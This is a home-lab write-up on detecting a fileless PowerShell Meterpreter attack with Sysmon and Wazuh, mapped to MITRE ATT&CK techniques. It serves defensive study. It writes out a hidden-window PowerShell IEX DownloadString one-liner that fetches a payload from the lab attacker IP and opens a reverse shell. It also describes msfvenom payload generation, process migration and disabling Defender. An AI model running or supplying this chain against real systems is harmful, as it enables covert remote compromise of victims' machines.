Project Summary
This project demonstrates a fileless malware attack using a PowerShell IEX DownloadString payload generated in psh-reflection format. The payload executes entirely in memory — no file is written to disk on the victim machine. Detection is achieved through Sysmon command-line argument logging forwarded to Wazuh SIEM, mapped to MITRE ATT&CK.
Overview
This lab highlights a critical detection gap: traditional AV scans files on disk and finds nothing. Sysmon defeats fileless attacks by capturing the full PowerShell command line at process creation time, regardless of whether a file exists on disk.
The objective was to demonstrate how behavioral detection via command-line logging catches what signature-based tools miss.
Lab Environment
| Role | OS | IP | Tools |
|---|---|---|---|
| Attacker | Kali Linux (VM) | 192.168.0.244 | Metasploit 6.4.56, msfvenom |
| Victim | Windows 10 (VM) | 192.168.0.29 | Sysmon64 (Running), Wazuh Agent |
| SIEM | Ubuntu Server (VM) | — | Wazuh 4.x |
Prerequisites Check
Before the attack, Sysmon64 and WazuhSvc were confirmed running on the victim. Defender real-time protection disabled (DisableRealtimeMonitoring: True).
Attack Chain
- Payload generation — msfvenom creates
payload1.ps1using-f psh-reflectionformat (in-memory only) - Delivery — Python HTTP server serves
payload1.ps1on port 8080 - Execution — victim runs:
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.244:8080/payload1.ps1')" - Session — Meterpreter session opens; payload never touches disk
- Migration —
migrate 2080moves session into another process - Reconnaissance —
whoami,hostname,net user,netstat -ano
Why This Is “Fileless”
- The
-f psh-reflectionformat outputs a PowerShell script that uses .NET reflection to load shellcode directly into memory DownloadString()fetches the script as a string object — it is never saved as a fileIEX(Invoke-Expression) executes the string directly in PowerShell process memory- Result: no file on disk, no hash for AV to scan, no artifact for forensic file recovery
Detection Results
Sysmon Event ID 1 — Process Creation
Sysmon captured the full PowerShell command line including IEX, DownloadString, and the payload URL.
- ProcessId:
5036 - Image:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - IntegrityLevel: High
- Key IOCs:
IEX+DownloadStringin command line,-ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden
Sysmon Event ID 3 — Network Connection
powershell.exe (PID 5036) initiated outbound TCP connection to 192.168.0.244:4444.
Event Correlation
EID 3 logged at 17:35:57 — EID 1 at 17:35:59. Both share the same ProcessGuid {48579f23-e57f-6a11-5102-000000002000}. The network connection (payload download) happened 2 seconds before the process creation event — typical timing pattern for DownloadString + IEX execution, useful for timeline reconstruction.
MITRE ATT&CK Techniques Observed
| Technique ID | Name |
|---|---|
| T1059.001 | Command and Scripting Interpreter: PowerShell — IEX DownloadString, in-memory |
| T1055 | Process Injection / Migration — migrate 2080 |
| T1105 | Ingress Tool Transfer — payload1.ps1 fetched at runtime |
| T1571 | Non-Standard Port — C2 on port 4444 |
| T1562.001 | Impair Defenses — Defender disabled |
| T1564.003 | Hide Artifacts: Hidden Window — -WindowStyle Hidden |
Key Findings
- A fileless Meterpreter payload executed entirely in memory — no file written to disk on the victim.
- Sysmon EID 1 captured the complete PowerShell command line including
IEXandDownloadString— the single most valuable detection artifact. - Sysmon EID 3 logged the outbound C2 connection from
powershell.exeto port 4444. - Event correlation via shared ProcessGuid enabled precise timeline reconstruction.
- Key lesson: fileless attacks completely bypass disk-based AV. Sysmon command-line logging (EID 1) is the critical control that makes these attacks visible.